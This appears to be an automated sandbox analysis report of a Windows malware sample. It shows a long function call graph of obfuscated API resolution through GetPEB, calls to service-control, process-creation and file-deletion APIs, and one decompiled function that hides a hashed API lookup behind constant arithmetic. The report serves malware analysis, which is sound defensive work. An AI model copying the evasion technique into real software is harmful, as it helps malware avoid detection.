2359ca 4241->4242 4243 222d9f GetPEB 4242->4243 4244 22c9ea 4243->4244 4244->4237 4245 23f949 4244->4245 4246 23f95d 4245->4246 4247 222d9f GetPEB 4246->4247 4248 23f9d5 4247->4248 4248->4237 4254 235bb3 4249->4254 4253 233635 4253->4206 4255 222d9f GetPEB 4254->4255 4256 23361f 4255->4256 4257 227a47 4256->4257 4258 227a66 4257->4258 4259 222d9f GetPEB 4258->4259 4260 227ae7 RtlAllocateHeap 4259->4260 4260->4253 4262 222d9f GetPEB 4261->4262 4263 22c243 4262->4263 4263->3971 4265 2268f4 4264->4265 4266 235bb3 GetPEB 4265->4266 4267 226a03 4266->4267 4270 2340f4 4267->4270 4271 234111 4270->4271 4272 222d9f GetPEB 4271->4272 4273 226a18 4272->4273 4273->3971 4280 23eec0 4274->4280 4277 233512 RtlAllocateHeap GetPEB 4277->4280 4278 23f7f1 4278->3985 4279 2268de GetPEB 4279->4280 4280->4277 4280->4278 4280->4279 4284 23e689 2 API calls 4280->4284 4305 222e96 4280->4305 4309 2295c9 4280->4309 4313 238cd6 4280->4313 4317 23e9e9 4280->4317 4321 225ae2 4280->4321 4284->4280 4286 2301cf 4285->4286 4287 222d9f GetPEB 4286->4287 4288 230244 4287->4288 4288->3985 4290 22eb4e 4289->4290 4291 222d9f GetPEB 4290->4291 4292 22ebe2 OpenSCManagerW 4291->4292 4292->3985 4294 22ea9f 4293->4294 4295 222d9f GetPEB 4294->4295 4296 22eb24 SHGetFolderPathW 4295->4296 4296->3985 4298 23e69f 4297->4298 4299 222d9f GetPEB 4298->4299 4300 23e707 CloseServiceHandle 4299->4300 4300->3985 4302 23bde0 4301->4302 4303 22c1dc GetPEB 4302->4303 4304 23be03 4303->4304 4304->3985 4306 222eb2 4305->4306 4307 222d9f GetPEB 4306->4307 4308 222f22 OpenServiceW 4307->4308 4308->4280 4310 2295f4 4309->4310 4311 222d9f GetPEB 4310->4311 4312 22966f 4311->4312 4312->4280 4314 238cf2 4313->4314 4315 222d9f GetPEB 4314->4315 4316 238d61 4315->4316 4316->4280 4318 23ea28 4317->4318 4319 222d9f GetPEB 4318->4319 4320 23eaa8 4319->4320 4320->4280 4322 222d9f GetPEB 4321->4322 4323 225b62 4322->4323 4323->4280 4325 228db0 4324->4325 4352 241310 4325->4352 4328 241310 GetPEB 4329 229085 4328->4329 4330 241310 GetPEB 4329->4330 4331 2290a1 4330->4331 4356 2308a0 4331->4356 4334 2308a0 GetPEB 4335 2290d4 4334->4335 4360 23e2c5 4335->4360 4337 22910d 4337->3994 4339 23e4b0 4338->4339 4340 22ab66 2 API calls 4339->4340 4341 23e63f 4340->4341 4372 223bf8 4341->4372 4344 22ae03 GetPEB 4345 23e66f 4344->4345 4376 22bab0 4345->4376 4347 23e680 4347->3989 4349 2412c1 4348->4349 4380 2418ed 4349->4380 4353 24132d 4352->4353 4364 223efe 4353->4364 4357 2308b9 4356->4357 4358 222d9f GetPEB 4357->4358 4359 2290bc 4358->4359 4359->4334 4361 23e2d8 4360->4361 4362 222d9f GetPEB 4361->4362 4363 23e34e SHFileOperationW 4362->4363 4363->4337 4365 223f17 4364->4365 4368 223cd1 4365->4368 4369 223cec 4368->4369 4370 222d9f GetPEB 4369->4370 4371 223d79 4370->4371 4371->4328 4373 223c17 4372->4373 4374 22c1dc GetPEB 4373->4374 4375 223c33 4374->4375 4375->4344 4377 22bac3 4376->4377 4378 222d9f GetPEB 4377->4378 4379 22bb40 DeleteFileW 4378->4379 4379->4347 4381 241910 4380->4381 4382 222d9f GetPEB 4381->4382 4383 241306 4382->4383 4383->3994 4385 230efc 4384->4385 4386 222d9f GetPEB 4385->4386 4387 230f65 4386->4387 4387->4009 4389 22c7b4 4388->4389 4390 222d9f GetPEB 4389->4390 4391 22c83b 4390->4391 4391->4009 4393 22703d 4392->4393 4394 222d9f GetPEB 4393->4394 4395 2270b2 4394->4395 4395->4006 4397 23bc6a 4396->4397 4398 222d9f GetPEB 4397->4398 4399 23bcee 4398->4399 4399->4014 4404 22e9ac 4400->4404 4401 22ea4f 4403 2308a0 GetPEB 4401->4403 4405 22ea4d 4403->4405 4404->4401 4404->4405 4406 2412a8 GetPEB 4404->4406 4407 23ba68 4404->4407 4405->4026 4406->4404 4408 23ba7e 4407->4408 4409 222d9f GetPEB 4408->4409 4410 23bade 4409->4410 4410->4404 4412 225fb4 4411->4412 4413 22c1dc GetPEB 4412->4413 4414 225fda 4413->4414 4414->4042 4416 22972e 4415->4416 4417 241310 GetPEB 4416->4417 4418 229995 4417->4418 4425 23679c 4418->4425 4420 2299d1 4421 2299dc 4420->4421 4422 234dad 2 API calls 4420->4422 4421->4037 4423 2299fc 4422->4423 4424 234dad 2 API calls 4423->4424 4424->4421 4426 2367d5 4425->4426 4427 222d9f GetPEB 4426->4427 4428 236847 CreateProcessW 4427->4428 4428->4420 4430 22f4d9 4429->4430 4431 222d9f GetPEB 4430->4431 4432 22f533 4431->4432 4432->4044 4434 222d9f GetPEB 4433->4434 4435 23e3ee 4434->4435 4435->4044 4439 235636 4436->4439 4437 233512 2 API calls 4437->4439 4438 23596d 4440 22b267 GetPEB 4438->4440 4439->4437 4439->4438 4441 23596b 4439->4441 4451 22b267 4439->4451 4440->4441 4441->4044 4444 22bca3 4443->4444 4445 222d9f GetPEB 4444->4445 4446 22bd00 4445->4446 4446->4044 4448 230005 4447->4448 4449 222d9f GetPEB 4448->4449 4450 230094 4449->4450 4450->4048 4452 22b29a 4451->4452 4453 222d9f GetPEB 4452->4453 4454 22b31d 4453->4454 4454->4439 4463 232a6a 4455->4463 4456 232bb6 4456->4061 4458 233512 2 API calls 4458->4463 4459 232bb8 4460 2268de GetPEB 4459->4460 4460->4456 4461 22ab66 2 API calls 4461->4463 4462 22c1dc GetPEB 4462->4463 4463->4456 4463->4458 4463->4459 4463->4461 4463->4462 4464 22ae03 GetPEB 4463->4464 4521 23c9a9 4463->4521 4464->4463 4468 2370f5 4465->4468 4466 233512 RtlAllocateHeap GetPEB 4466->4468 4468->4466 4470 23744f 4468->4470 4472 22ab66 2 API calls 4468->4472 4474 237144 4468->4474 4475 22c1dc GetPEB 4468->4475 4479 237163 4468->4479 4482 22ae03 GetPEB 4468->4482 4526 22bb4b 4468->4526 4530 22f545 4468->4530 4534 23fd29 4468->4534 4473 22bb4b 2 API calls 4470->4473 4472->4468 4476 23746e 4473->4476 4477 2268de GetPEB 4474->4477 4475->4468 4538 22f060 4476->4538 4477->4479 4479->4061 4481 22ae03 GetPEB 4481->4479 4482->4468 4484 221fdb 4483->4484 4486 233512 2 API calls 4484->4486 4487 23fd29 GetPEB 4484->4487 4490 222823 4484->4490 4492 2268de GetPEB 4484->4492 4546 2345cd 4484->4546 4553 23fa99 4484->4553 4557 231831 4484->4557 4573 23ff31 4484->4573 4486->4484 4487->4484 4490->4061 4492->4484 4499 22bd31 4493->4499 4495 233512 2 API calls 4495->4499 4496 22bffa 4498 2268de GetPEB 4496->4498 4500 22c013 4498->4500 4499->4495 4499->4496 4499->4500 4501 23fd29 GetPEB 4499->4501 4604 23cc89 4499->4604 4611 2364f1 4499->4611 4500->4061 4501->4499 4519 237c38 4502->4519 4503 240411 GetPEB 4503->4519 4506 238b27 4509 240411 GetPEB 4506->4509 4513 238881 4509->4513 4510 2268de GetPEB 4510->4519 4512 22ab66 2 API calls 4512->4519 4513->4061 4514 23886b 4621 240411 4514->4621 4517 22ae03 GetPEB 4517->4519 4518 22b6d1 GetPEB 4518->4519 4519->4503 4519->4506 4519->4510 4519->4512 4519->4513 4519->4514 4519->4517 4519->4518 4625 2284b8 4519->4625 4628 240349 4519->4628 4632 2275a5 4519->4632 4636 2300a0 4519->4636 4640 240867 4519->4640 4649 2390db 4519->4649 4653 23bd01 4519->4653 4522 23c9c7 4521->4522 4523 23d2a8 GetPEB 4522->4523 4524 233512 2 API calls 4522->4524 4525 23cc7f 4522->4525 4523->4522 4524->4522 4525->4463 4527 22bb61 4526->4527 4528 233512 2 API calls 4527->4528 4529 22bc13 4528->4529 4529->4468 4529->4529 4531 22f567 4530->4531 4532 22c1dc GetPEB 4531->4532 4533 22f587 4532->4533 4533->4468 4535 23fd44 4534->4535 4542 22c14b 4535->4542 4539 22f07c 4538->4539 4540 22c1dc GetPEB 4539->4540 4541 22f098 4540->4541 4541->4481 4543 22c167 4542->4543 4544 222d9f GetPEB 4543->4544 4545 22c1cc 4544->4545 4545->4468 4551 2345ee 4546->4551 4547 234b24 4550 2268de GetPEB 4547->4550 4548 234b0a 4548->4484 4549 233512 2 API calls 4549->4551 4550->4548 4551->4547 4551->4548 4551->4549 4552 22ad30 GetPEB 4551->4552 4552->4551 4554 23faaf 4553->4554 4555 23fd29 GetPEB 4554->4555 4556 23fb24 4555->4556 4556->4484 4571 231867 4557->4571 4560 23274a 4560->4560 4561 232620 4566 227027 GetPEB 4561->4566 4563 2268de GetPEB 4563->4571 4565 233512 2 API calls 4565->4571 4568 232641 4566->4568 4568->4484 4569 22ab66 RtlAllocateHeap GetPEB 4569->4571 4570 230eda GetPEB 4570->4571 4571->4560 4571->4561 4571->4563 4571->4565 4571->4569 4571->4570 4572 22ae03 GetPEB 4571->4572 4580 23fda3 4571->4580 4584 22e723 4571->4584 4588 22ba16 4571->4588 4592 233b45 4571->4592 4596 23fbcf 4571->4596 4572->4571 4576 23ff5b 4573->4576 4574 233512 2 API calls 4574->4576 4575 2401b7 4575->4484 4576->4574 4576->4575 4577 23f88f GetPEB 4576->4577 4578 24019f 4576->4578 4577->4576 4600 23f88f 4578->4600 4581 23fdc2 4580->4581 4582 222d9f GetPEB 4581->4582 4583 23fe4a 4582->4583 4583->4571 4585 22e739 4584->4585 4586 222d9f GetPEB 4585->4586 4587 22e7c2 4586->4587 4587->4571 4589 22ba38 4588->4589 4590 222d9f GetPEB 4589->4590 4591 22ba9c 4590->4591 4591->4571 4593 233b7a 4592->4593 4594 222d9f GetPEB 4593->4594 4595 233bff 4594->4595 4595->4571 4597 23fbf9 4596->4597 4598 222d9f GetPEB 4597->4598 4599 23fc7d 4598->4599 4599->4571 4601 23f8ab 4600->4601 4602 23fd29 GetPEB 4601->4602 4603 23f93a 4602->4603 4603->4575 4605 23cca8 4604->4605 4606 23d19b 4605->4606 4607 233512 2 API calls 4605->4607 4609 22b335 GetPEB 4605->4609 4610 23d187 4605->4610 4608 2268de GetPEB 4606->4608 4607->4605 4608->4610 4609->4605 4610->4499 4615 23650a 4611->4615 4612 23674a 4617 23d6c0 4612->4617 4613 231831 2 API calls 4613->4615 4615->4612 4615->4613 4616 236748 4615->4616 4616->4499 4618 23d6ef 4617->4618 4619 222d9f GetPEB 4618->4619 4620 23d753 4619->4620 4620->4616 4622 240427 4621->4622 4623 222d9f GetPEB 4622->4623 4624 2404d3 4623->4624 4624->4513 4657 22cf26 4625->4657 4629 240374 4628->4629 4630 222d9f GetPEB 4629->4630 4631 2403f7 4630->4631 4631->4519 4633 2275c4 4632->4633 4634 222d9f GetPEB 4633->4634 4635 227663 4634->4635 4635->4519 4637 2300d9 4636->4637 4638 222d9f GetPEB 4637->4638 4639 230170 4638->4639 4639->4519 4641 240b8b 4640->4641 4642 233512 RtlAllocateHeap GetPEB 4641->4642 4644 240cb5 4641->4644 4647 23fd29 GetPEB 4641->4647 4648 2268de GetPEB 4641->4648 4661 22840b 4641->4661 4642->4641 4645 240cbd 4644->4645 4646 2268de GetPEB 4644->4646 4645->4519 4646->4645 4647->4641 4648->4641 4650 2390fd 4649->4650 4651 222d9f GetPEB 4650->4651 4652 239176 4651->4652 4652->4519 4654 23bd24 4653->4654 4655 222d9f GetPEB 4654->4655 4656 23bd9e 4655->4656 4656->4519 4658 22cf4c 4657->4658 4659 222d9f GetPEB 4658->4659 4660 2285a6 4659->4660 4660->4519 4662 22842d 4661->4662 4663 222d9f GetPEB 4662->4663 4664 2284a4 4663->4664 4664->4641 4666 222d9f GetPEB 4665->4666 4667 22b247 4666->4667 4668 2285b6 4667->4668 4669 2285cf 4668->4669 4670 222d9f GetPEB 4669->4670 4671 228641 4670->4671 4671->3957 4673 234fbe 4672->4673 4674 222d9f GetPEB 4673->4674 4675 235035 4674->4675 4675->4074 4687 22f58f 4676->4687 4680 2419b4 4679->4680 4710 233c1b 4680->4710 4685 234dad 2 API calls 4686 241b49 4685->4686 4686->4074 4688 22f5ba 4687->4688 4690 22f866 4688->4690 4693 22c78b 4688->4693 4696 240cf5 4688->4696 4699 23e3f7 4688->4699 4703 240296 4688->4703 4707 223c3b 4688->4707 4692 234dad 2 API calls 4690->4692 4692->4693 4693->4074 4697 24074a GetPEB 4696->4697 4698 240d40 4697->4698 4698->4688 4700 23e40d 4699->4700 4701 222d9f GetPEB 4700->4701 4702 23e48a 4701->4702 4702->4688 4704 2402af 4703->4704 4705 222d9f GetPEB 4704->4705 4706 24033b 4705->4706 4706->4688 4708 222d9f GetPEB 4707->4708 4709 223cc3 4708->4709 4709->4688 4711 222d9f GetPEB 4710->4711 4712 233caa 4711->4712 4712->4686 4713 231785 4712->4713 4714 2317a6 4713->4714 4715 222d9f GetPEB 4714->4715 4716 23181e 4715->4716 4716->4685 4723 226bb0 4717->4723 4718 226c1e 4718->4085 4719 2268de GetPEB 4719->4723 4720 225e0b GetPEB 4720->4723 4722 234dad 2 API calls 4722->4723 4723->4718 4723->4719 4723->4720 4723->4722 4817 22f88a 4723->4817 4729 235318 4724->4729 4725 235410 4726 22f88a GetPEB 4725->4726 4727 23540e 4726->4727 4727->4085 4729->4725 4729->4727 4825 234eff 4729->4825 4829 238d71 4729->4829 4837 23e713 4729->4837 4742 23aad1 4732->4742 4733 22ea7b 2 API calls 4733->4742 4734 2412a8 GetPEB 4734->4742 4735 23acc8 4735->4085 4736 234fa8 GetPEB 4736->4742 4738 22ae03 GetPEB 4738->4742 4739 22ab66 RtlAllocateHeap GetPEB 4739->4742 4740 229700 3 API calls 4740->4742 4741 22e7ce GetPEB 4741->4742 4742->4733 4742->4734 4742->4735 4742->4736 4742->4738 4742->4739 4742->4740 4742->4741 4850 228650 4742->4850 4854 23c38f 4742->4854 4865 238fd2 4744->4865 4746 2268de GetPEB 4757 22537f 4746->4757 4747 22579e 4753 234dad 2 API calls 4747->4753 4749 229700 3 API calls 4749->4757 4751 23ba68 GetPEB 4751->4757 4752 22579c 4752->4085 4753->4752 4754 2412a8 GetPEB 4754->4757 4755 22ae03 GetPEB 4755->4757 4756 22ea7b 2 API calls 4756->4757 4757->4746 4757->4747 4757->4749 4757->4751 4757->4752 4757->4754 4757->4755 4757->4756 4758 234fa8 GetPEB 4757->4758 4760 23c9a9 2 API calls 4757->4760 4761 228650 GetPEB 4757->4761 4762 22ab66 RtlAllocateHeap GetPEB 4757->4762 4763 22e7ce GetPEB 4757->4763 4764 23c38f 3 API calls 4757->4764 4868 225eb5 4757->4868 4872 22777b 4757->4872 4878 23d37b 4757->4878 4758->4757 4760->4757 4761->4757 4762->4757 4763->4757 4764->4757 4775 2238b0 4765->4775 4766 223b5f 4768 229700 3 API calls 4766->4768 4767 223b32 4767->4085 4770 223b9c 4768->4770 4769 223b37 4771 234dad 2 API calls 4769->4771 4770->4767 4773 234dad 2 API calls 4770->4773 4771->4767 4772 22b186 GetPEB 4772->4775 4773->4769 4775->4766 4775->4767 4775->4769 4775->4772 4778 2412a8 GetPEB 4775->4778 4779 234fa8 GetPEB 4775->4779 4780 234dad CloseHandle GetPEB 4775->4780 4781 228650 GetPEB 4775->4781 4782 22ab66 2 API calls 4775->4782 4783 22e7ce GetPEB 4775->4783 4784 22ae03 GetPEB 4775->4784 4785 23c38f 3 API calls 4775->4785 4882 23363d 4775->4882 4892 229685 4775->4892 4895 22b41a 4775->4895 4778->4775 4779->4775 4780->4775 4781->4775 4782->4775 4783->4775 4784->4775 4785->4775 4796 228192 4786->4796 4787 22ea7b 2 API calls 4787->4796 4788 228397 4788->4085 4789 2412a8 GetPEB 4789->4796 4790 234fa8 GetPEB 4790->4796 4791 228650 GetPEB 4791->4796 4792 22ae03 GetPEB 4792->4796 4793 229700 3 API calls 4793->4796 4794 22ab66 RtlAllocateHeap GetPEB 4794->4796 4795 22e7ce GetPEB 4795->4796 4796->4787 4796->4788 4796->4789 4796->4790 4796->4791 4796->4792 4796->4793 4796->4794 4796->4795 4797 23c38f 3 API calls 4796->4797 4797->4796 4804 230c1d 4798->4804 4799 230d15 4800 22f88a GetPEB 4799->4800 4802 230d13 4800->4802 4801 238d71 GetPEB 4801->4804 4802->4085 4803 234eff GetPEB 4803->4804 4804->4799 4804->4801 4804->4802 4804->4803 4805 23e713 GetPEB 4804->4805 4805->4804 4807 228c4b 4806->4807 4808 229700 3 API calls 4807->4808 4809 2412a8 GetPEB 4807->4809 4810 228d8a 4807->4810 4811 234fa8 GetPEB 4807->4811 4812 228650 GetPEB 4807->4812 4813 22ab66 2 API calls 4807->4813 4814 22e7ce GetPEB 4807->4814 4815 22ae03 GetPEB 4807->4815 4816 23c38f 3 API calls 4807->4816 4808->4807 4809->4807 4810->4085 4811->4807 4812->4807 4813->4807 4814->4807 4815->4807 4816->4807 4818 22f89d 4817->4818 4821 225961 4818->4821 4822 22597e 4821->4822 4823 222d9f GetPEB 4822->4823 4824 2259f7 4823->4824 4824->4723 4826 234f24 4825->4826 4827 222d9f GetPEB 4826->4827 4828 234f95 4827->4828 4828->4729 4830 238d8c 4829->4830 4831 238fc8 4830->4831 4842 22b0da 4830->4842 4831->4729 4834 23fd29 GetPEB 4835 238f83 4834->4835 4835->4831 4836 23fd29 GetPEB 4835->4836 4836->4835 4840 23e72b 4837->4840 4838 23e875 4838->4729 4839 23f949 GetPEB 4839->4840 4840->4838 4840->4839 4846 23d20a 4840->4846 4843 22b0f7 4842->4843 4844 222d9f GetPEB 4843->4844 4845 22b172 4844->4845 4845->4831 4845->4834 4847 23d220 4846->4847 4848 222d9f GetPEB 4847->4848 4849 23d29a 4848->4849 4849->4840 4851 228664 4850->4851 4852 225ae2 GetPEB 4851->4852 4853 228710 4852->4853 4853->4742 4855 23c3a8 4854->4855 4856 23c64b 4855->4856 4857 23c649 4855->4857 4860 23e938 2 API calls 4855->4860 4861 22eeb8 4855->4861 4858 234dad 2 API calls 4856->4858 4857->4742 4858->4857 4860->4855 4862 22eed9 4861->4862 4863 222d9f GetPEB 4862->4863 4864 22ef5a 4863->4864 4864->4855 4866 222d9f GetPEB 4865->4866 4867 23903c 4866->4867 4867->4757 4869 225ee9 4868->4869 4870 222d9f GetPEB 4869->4870 4871 225f68 4870->4871 4871->4757 4877 2277a8 4872->4877 4873 227a1d 4874 23f88f GetPEB 4873->4874 4875 227a1b 4874->4875 4875->4757 4876 233512 2 API calls 4876->4877 4877->4873 4877->4875 4877->4876 4879 23d3a0 4878->4879 4880 22c1dc GetPEB 4879->4880 4881 23d3c0 4880->4881 4881->4757 4884 23367d 4882->4884 4883 241310 GetPEB 4883->4884 4884->4883 4885 233b1e 4884->4885 4887 22ab66 2 API calls 4884->4887 4889 233b1c 4884->4889 4891 22ae03 GetPEB 4884->4891 4903 235b0e 4884->4903 4907 23c8bd 4884->4907 4911 226e34 4885->4911 4887->4884 4889->4775 4891->4884 4893 222d9f GetPEB 4892->4893 4894 2296f7 4893->4894 4894->4775 4898 22b43c 4895->4898 4899 22b615 4898->4899 4900 229685 GetPEB 4898->4900 4902 22b62e 4898->4902 4915 2413b1 4898->4915 4919 23fb2b 4898->4919 4901 234dad 2 API calls 4899->4901 4900->4898 4901->4902 4902->4775 4904 235b28 4903->4904 4905 222d9f GetPEB 4904->4905 4906 235ba3 4905->4906 4906->4884 4908 23c8fa 4907->4908 4909 222d9f GetPEB 4908->4909 4910 23c986 4909->4910 4910->4884 4912 226e4a 4911->4912 4913 222d9f GetPEB 4912->4913 4914 226ecb 4913->4914 4914->4889 4916 2413db 4915->4916 4917 222d9f GetPEB 4916->4917 4918 241455 4917->4918 4918->4898 4920 23fb44 4919->4920 4921 222d9f GetPEB 4920->4921 4922 23fbc1 4921->4922 4922->4898 4924 2287b5 4923->4924 4925 222d9f GetPEB 4924->4925 4926 22882f 4925->4926 4926->4092 4928 23c2fa 4927->4928 4929 222d9f GetPEB 4928->4929 4930 23c375 4929->4930 4930->4092 4932 227b0e 4931->4932 4933 222d9f GetPEB 4932->4933 4934 227b76 4933->4934 4934->4096 4936 221973 4935->4936 4937 223bf8 GetPEB 4936->4937 4939 221f7e 4936->4939 4941 221f7c 4936->4941 4943 22ab66 RtlAllocateHeap GetPEB 4936->4943 4944 22e7ce GetPEB 4936->4944 4945 221950 2 API calls 4936->4945 4946 22ae03 GetPEB 4936->4946 4947 23f7fc 4936->4947 4951 23baea 4936->4951 4937->4936 4955 238c35 4939->4955 4941->4107 4943->4936 4944->4936 4945->4936 4946->4936 4948 23f812 4947->4948 4949 222d9f GetPEB 4948->4949 4950 23f881 4949->4950 4950->4936 4952 23bb04 4951->4952 4953 222d9f GetPEB 4952->4953 4954 23bba3 4953->4954 4954->4936 4956 238c4e 4955->4956 4957 222d9f GetPEB 4956->4957 4958 238ccb 4957->4958 4958->4941 4960 223da3 4959->4960 4961 222d9f GetPEB 4960->4961 4962 223e1f 4961->4962 4962->4123 4964 235a75 4963->4964 4965 222d9f GetPEB 4964->4965 4966 235b03 4965->4966 4966->4123 4968 23a17e 4967->4968 4969 23a3cc 4968->4969 4971 23a3ca 4968->4971 4979 233f73 4968->4979 4970 22bb4b 2 API calls 4969->4970 4972 23a3e2 4970->4972 4971->4127 4983 22f154 4972->4983 4978 22ae03 GetPEB 4978->4971 4980 233f89 4979->4980 4981 222d9f GetPEB 4980->4981 4982 234007 4981->4982 4982->4968 4992 225c03 4983->4992 4987 22f2b6 4988 23d1c1 4987->4988 4989 23d1e5 4988->4989 4990 22c1dc GetPEB 4989->4990 4991 23a409 4990->4991 4991->4978 4993 225c1d 4992->4993 4994 222d9f GetPEB 4993->4994 4995 225c8b 4994->4995 4995->4987 4996 22884a 4995->4996 4997 228877 4996->4997 4998 222d9f GetPEB 4997->4998 4999 2288de 4998->4999 4999->4987 5003 2410a9 5000->5003 5001 22ab66 2 API calls 5001->5003 5002 233512 2 API calls 5002->5003 5003->5001 5003->5002 5004 23bdb5 GetPEB 5003->5004 5005 24126e 5003->5005 5007 22ae03 GetPEB 5003->5007 5009 241287 5003->5009 5018 23eae6 5003->5018 5004->5003 5008 2268de GetPEB 5005->5008 5007->5003 5008->5009 5009->4137 5011 23ee25 5010->5011 5022 230d33 5011->5022 5015 226e11 5014->5015 5016 226e2f 5014->5016 5015->5016 5017 2268de GetPEB 5015->5017 5016->4137 5017->5015 5019 23eb05 5018->5019 5020 233512 2 API calls 5019->5020 5021 23ebb1 5020->5021 5021->5003 5021->5021 5023 230d4d 5022->5023 5026 230ead 5023->5026 5029 230eab 5023->5029 5030 233512 2 API calls 5023->5030 5031 23acd3 5023->5031 5041 243672 5023->5041 5046 229a7d 5023->5046 5028 2268de GetPEB 5026->5028 5028->5029 5029->4137 5030->5023 5032 23b1d7 5031->5032 5033 22ab66 RtlAllocateHeap GetPEB 5032->5033 5034 23b1ff 5032->5034 5037 23b38c 5032->5037 5039 22ae03 GetPEB 5032->5039 5040 230eda GetPEB 5032->5040 5063 23f9e2 5032->5063 5033->5032 5036 227027 GetPEB 5034->5036 5038 23b220 5036->5038 5037->5037 5038->5023 5039->5032 5040->5032 5067 23e884 5041->5067 5044 2268de GetPEB 5045 243775 5044->5045 5045->5023 5059 22a69f 5046->5059 5047 22ab66 RtlAllocateHeap GetPEB 5047->5059 5049 22ab36 5051 227027 GetPEB 5049->5051 5054 22ab34 5051->5054 5054->5023 5055 234e64 GetPEB 5055->5059 5056 230eda GetPEB 5056->5059 5057 23e884 GetPEB 5057->5059 5059->5047 5059->5049 5059->5054 5059->5055 5059->5056 5059->5057 5060 22ae03 GetPEB 5059->5060 5061 23fd29 GetPEB 5059->5061 5062 23f9e2 GetPEB 5059->5062 5071 23d76f 5059->5071 5075 225fe2 5059->5075 5079 223e2a 5059->5079 5083 22cfce 5059->5083 5098 22f0a0 5059->5098 5060->5059 5061->5059 5062->5059 5064 23fa0f 5063->5064 5065 222d9f GetPEB 5064->5065 5066 23fa7d 5065->5066 5066->5032 5068 23e897 5067->5068 5069 222d9f GetPEB 5068->5069 5070 23e92c 5069->5070 5070->5044 5072 23d785 5071->5072 5073 222d9f GetPEB 5072->5073 5074 23d7fe 5073->5074 5074->5059 5076 226004 5075->5076 5077 222d9f GetPEB 5076->5077 5078 226070 5077->5078 5078->5059 5080 223e5a 5079->5080 5081 222d9f GetPEB 5080->5081 5082 223ee1 5081->5082 5082->5059 5091 22dd8e 5083->5091 5084 22e107 5089 227027 GetPEB 5084->5089 5086 2268de GetPEB 5086->5091 5087 23fbcf GetPEB 5087->5091 5088 22e23e 5088->5088 5092 22e125 5089->5092 5090 233512 2 API calls 5090->5091 5091->5084 5091->5086 5091->5087 5091->5088 5091->5090 5093 230eda GetPEB 5091->5093 5094 22ab66 RtlAllocateHeap GetPEB 5091->5094 5095 23ba68 GetPEB 5091->5095 5097 22ae03 GetPEB 5091->5097 5102 225c98 5091->5102 5106 234016 5091->5106 5092->5059 5093->5091 5094->5091 5095->5091 5097->5091 5099 22f0bc 5098->5099 5100 222d9f GetPEB 5099->5100 5101 22f13f 5100->5101 5101->5059 5103 225cc3 5102->5103 5104 222d9f GetPEB 5103->5104 5105 225d47 5104->5105 5105->5091 5107 23404d 5106->5107 5108 222d9f GetPEB 5107->5108 5109 2340d3 5108->5109 5109->5091 5111 22c693 5110->5111 5112 222d9f GetPEB 5111->5112 5113 22c6fb 5112->5113 5113->4143 5115 231215 5114->5115 5116 222d9f GetPEB 5115->5116 5117 23128e 5116->5117 5117->4169 5119 225b7e 5118->5119 5120 222d9f GetPEB 5119->5120 5121 2243d9 5120->5121 5121->3938 5123 224522 5122->5123 5125 224704 5123->5125 5127 224702 5123->5127 5128 241310 GetPEB 5123->5128 5138 22ac8c 5123->5138 5142 239045 5125->5142 5127->4186 5128->5123 5135 23448f 5129->5135 5131 2345a5 5132 227af8 GetPEB 5131->5132 5133 2345a3 5132->5133 5133->4186 5134 22ab66 2 API calls 5134->5135 5135->5131 5135->5133 5135->5134 5136 228786 GetPEB 5135->5136 5137 22ae03 GetPEB 5135->5137 5146 22efa6 5135->5146 5136->5135 5137->5135 5139 22aca9 5138->5139 5140 222d9f GetPEB 5139->5140 5141 22ad23 5140->5141 5141->5123 5143 239062 5142->5143 5144 222d9f GetPEB 5143->5144 5145 2390c7 5144->5145 5145->5127 5147 22efbf 5146->5147 5148 222d9f GetPEB 5147->5148 5149 22f051 5148->5149 5149->5135 5150 23d80c 5151 23d8a5 5150->5151 5152 23d8cc 5150->5152 5156 235cf9 5151->5156 5155 233cbb 2 API calls 5155->5152 5166 236288 5156->5166 5157 23648d 5159 229700 3 API calls 5157->5159 5158 23e35a GetPEB 5158->5166 5160 23648b 5159->5160 5160->5152 5160->5155 5161 22ea7b 2 API calls 5161->5166 5162 241310 GetPEB 5162->5166 5163 22ab66 RtlAllocateHeap GetPEB 5163->5166 5164 2412a8 GetPEB 5164->5166 5166->5157 5166->5158 5166->5160 5166->5161 5166->5162 5166->5163 5166->5164 5167 22e7ce GetPEB 5166->5167 5168 22ae03 GetPEB 5166->5168 5169 23fc96 5166->5169 5167->5166 5168->5166 5170 23fcac 5169->5170 5171 222d9f GetPEB 5170->5171 5172 23fd1a lstrcmpiW 5171->5172 5172->5166

                                                                                                                      Executed Functions

                                                                                                                      Function 0022EA7B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 462 22ea7b-22eb35 call 22cf25 call 222d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0022EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t41;
				intOrPtr* _t50;
				void* _t51;
				signed int _t52;
				signed int _t53;
				void* _t60;

				_t60 = __edx;
				E0022CF25(_t41);
				_v16 = 0xd33285;
				_v16 = _v16 + 0xd9cb;
				_v16 = _v16 | 0xd94823ae;
				_v16 = _v16 ^ 0xd9d95ea2;
				_v8 = 0xf9f040;
				_v8 = _v8 ^ 0x026675a4;
				_t52 = 0x46;
				_v8 = _v8 / _t52;
				_t53 = 0x2b;
				_v8 = _v8 / _t53;
				_v8 = _v8 ^ 0x000f054e;
				_v12 = 0x255c2b;
				_v12 = _v12 ^ 0x0b9b7933;
				_v12 = _v12 + 0xffff1ebc;
				_v12 = _v12 ^ 0x0bb758ac;
				_t50 = E00222D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
				return _t51;
			}












                                                                                                                      0x0022ea85
                                                                                                                      0x0022ea9a
                                                                                                                      0x0022ea9f
                                                                                                                      0x0022eaa9
                                                                                                                      0x0022eab2
                                                                                                                      0x0022eab9
                                                                                                                      0x0022eac0
                                                                                                                      0x0022eac7
                                                                                                                      0x0022ead3
                                                                                                                      0x0022ead8
                                                                                                                      0x0022eae0
                                                                                                                      0x0022eae8
                                                                                                                      0x0022eaeb
                                                                                                                      0x0022eaf2
                                                                                                                      0x0022eaf9
                                                                                                                      0x0022eb00
                                                                                                                      0x0022eb07
                                                                                                                      0x0022eb1f
                                                                                                                      0x0022eb2e
                                                                                                                      0x0022eb35

                                                                                                                      APIs
